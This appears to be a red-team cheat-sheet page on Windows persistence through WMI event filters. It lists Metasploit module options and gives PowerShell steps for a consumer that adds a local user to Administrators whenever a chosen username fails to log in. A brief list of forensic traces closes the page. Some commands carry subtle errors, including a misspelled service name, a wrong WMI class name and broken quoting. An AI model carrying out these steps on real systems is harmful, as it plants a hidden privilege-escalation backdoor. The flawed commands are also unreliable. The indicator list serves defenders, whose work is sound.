WMI Persist With Event Filters
Automation
There are many great automated ways to do this.
Metasploit post module
exploit/windows/local/wmi_persistence
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CALLBACK_INTERVAL 1800000 yes Time between callbacks (In milliseconds). (Default: 1800000).
CLASSNAME UPDATER yes WMI event class name. (Default: UPDATER)
EVENT_ID_TRIGGER 4625 yes Event ID to trigger the payload. (Default: 4625)
PERSISTENCE_METHOD EVENT yes Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
PROCESS_TRIGGER CALC.EXE yes The process name to trigger the payload. (Default: CALC.EXE)
SESSION yes The session to run this module on.
USERNAME_TRIGGER BOB yes The username to trigger the payload. (Default: BOB)
WAITFOR_TRIGGER CALL yes The word to trigger the payload. (Default: CALL)
Manual Mode
Check if WMI is enabled, if it is not any
WMI
command that you execute will attempt to downloadWMI
This download process does log in the
WMI Log
Check if WMI is enabled on the remote system
reg query "HKLM\System\CurrentControlSet\Services\Winmgt"
Start REG_DWORD 0x2
0x2 --> Auto Start
0x3 --> Demand Start
0x4 --> Disabled
#OR
get-service Winmgmt
Check for existing entries
Check for existing event filter consumer bindings that are on the system
Get-Wmiobject -Class __FilterToConsumerBinding -NameSpace "root\Subscription"
Ensure the system is logging event logs for the type of event you want to use
auditpol /get /category:*
#OR for logon logoff
auditpol /get /category:Logon/Logoff
--output--
System audit policy
Category/Subcategory Setting
Logon/Logoff
Logon Success and Failure
Logoff Success
Account Lockout Success
IPsec Main Mode No Auditing
IPsec Quick Mode No Auditing
IPsec Extended Mode No Auditing
Special Logon Success
Other Logon/Logoff Events No Auditing
Network Policy Server Success and Failure
User / Device Claims No Auditing
Group Membership No Auditing
Create your own filter and consumer
$x='SCM System Log Filter'
$z='SCM System Log Consumer'
Now create the triggering event
$q='Select * from __InstanceCreationEvent WITHIN 10 where TargetInstance isa 'Win32-NtLogEvent' and TargetInstance.logfile='Security' and (TargetInstance.EventCode='4625')"
Now create your event filter
$wmifilter=Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$x;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$q} ErrorAction Stop
Create the event consumer
$wmiconsumer=Set-WmiInstance -Class CommandLineEventConsumer -NameSpace "root\subscription" -Arguments @{Name=$z;CommandLineTemplate='C:\\Windows\\System32\\windowspowershell\\v.1.0\\powershell.exe -v 2.0 -nop -c "if(wevtutil qe security /rd:true /f:text /c:1 `"*[System/EventID=4625]`" | findstr /i "fake username here"){net localgroup Administrators <localuser> /add}"'}
Combine the filter and the comsumer
Set-WmiInstance -Class __FilterToConsumerBinding -NameSpace "root\subscription" -Arguments @{Filter=$wmifilter;Consumer=$wmiconsumer}
Ensure Its all working and correct
Get-WmiObject -Class __FilterToConsumerBinding -NameSpace "root\subscription"
IOCs Left Behind
C:\Windows\System32\Wbem\Repository\INDEX.BTR
- Cotnains the names of event filter and event consumer
C:\Windows\System32\Wbem\Repository\OBJECTS.DATA
- Contains the names of event filter and event comsumer
- Contains the command in the event consumer
C:\Windows\System32\Wbem\Repository\MAPPING2.MAP
- Prefetch Files
"HKLM\Software\Microsoft\Wbem\Ess\//./root\CIMV2\MS_NT_EVENT_LOG_EVENT_PROVIDER"
Other Logs
5857 Active ScriptEventConsumer provider started with result code 0x0
Last updated